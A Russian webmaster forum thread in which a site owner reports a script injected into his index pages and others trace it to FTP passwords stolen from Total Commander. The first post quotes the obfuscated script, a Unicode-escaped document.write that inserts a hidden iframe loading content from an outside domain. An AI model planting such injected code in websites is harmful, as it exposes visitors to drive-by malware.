Обнаружил скриптик на мордочке

123 4
ШO
На сайте с 27.12.2005
Offline
375
3473

Сегодня, заходя на один из своих сайтов, увидел в строке состояния подгрузку какой-то дряни с непонятного домена, полез сразу на ftp и выяснил, что дата редактирования морды - 10.08.2007, хотя я сам ее 100 лет не трогал.

Внизу кода увидел следующее:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0074\u0072\u0061\u0066\u0066\u0069\u0063\u002e\u0062\u0069\u007a\u002f\u0072\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u002e\u0070\u0068\u0070\u003f\u0069\u0064\u003d\u0034\u0034\u0034\u0039\u0026\u0075\u0073\u0065\u0072\u003d\u0073\u0074\u0061\u0074\u0069\u0073\u0074\u0069\u0063\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Так же нашел это на других сайтах.

Хотел бы узнать, как эта дрянь могла проникнуть на сайты. Через зараженный комп или хакк хостинга.

Спасибо!

sun
На сайте с 22.10.2005
Offline
81
sun
#1

Скорее всего у вас пароли увели на фтп, в файле index.*?

devmen.com (http://devmen.com/)
iBBi
На сайте с 13.02.2007
Offline
314
#2

Обсуждалось много раз...

Угнали пароли с ftp менеджера (они там хранились?)

Продукты ispsystem по минимальным ценам (http://www.isplicense.ru/?from=4926)
Angelo
На сайте с 01.01.2007
Offline
125
#3

Была у меня такая штука, как я понял вирус украл у меня пароли доступа к ftp из тотал командера. Сам подсоеденился и вставил на хостинге во все индексные файлы зашифрованый ява скрипт, который вставлял в страницу iframe со ссылкой на вирус.

ШO
На сайте с 27.12.2005
Offline
375
#4
iBBi:
Угнали пароли с ftp менеджера (они там хранились?)

Да, там.

Angelo:
как я понял вирус украл у меня пароли доступа к ftp из тотал командера

Видимо у меня тоже.

Так, значит лучшая защита, не хранить пароли там?

iBBi
На сайте с 13.02.2007
Offline
314
#5
ШАНС-ON:

Так, значит лучшая защита, не хранить пароли там?

Пока нету другого способа, можно доступ к ftp прикрутить только к одному ip... (на одном проекте я так сделал а то ftp по 25 раз на день вводить устал)

Angelo
На сайте с 01.01.2007
Offline
125
#6
Так, значит лучшая защита, не хранить пароли там?

Из тотал командера 2 раза уводил пароли вирус, сейчас поставил cute ftp - полет нормальный. Видимо cute надежнее.

ШO
На сайте с 27.12.2005
Offline
375
#7

iBBi, у меня динамический :(

Angelo, попробую, у меня windows commander

kxk
На сайте с 30.01.2005
Offline
970
kxk
#8

Внесу 3 копейки, у самого пытались угонять icq, ftp и тд и это при включённом касперском и вебе с актуальными базами и за фаирволом. Когда меня лично это коснулось я подумал, а почему бы не использовать портативную версию бесплатной Filezilla Portable. Теперь программа всегда со мной на флешке и работает на любом компьютере и троянам до неё очень далеко. Рекомендую остальным.

Ваш DEVOPS
Kislov
На сайте с 29.04.2006
Offline
185
#9

ШАНС-ON, помнишь я в топике про не выплату зарплаты советовал тебе комп просканировать? Не послушал ты меня. :)

ШO
На сайте с 27.12.2005
Offline
375
#10

Kislov, ага, я на эту дрянь и кошу.

Но ни нода, ни Даниловская утилита ни чего не нашли. Чем сканнить то?

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий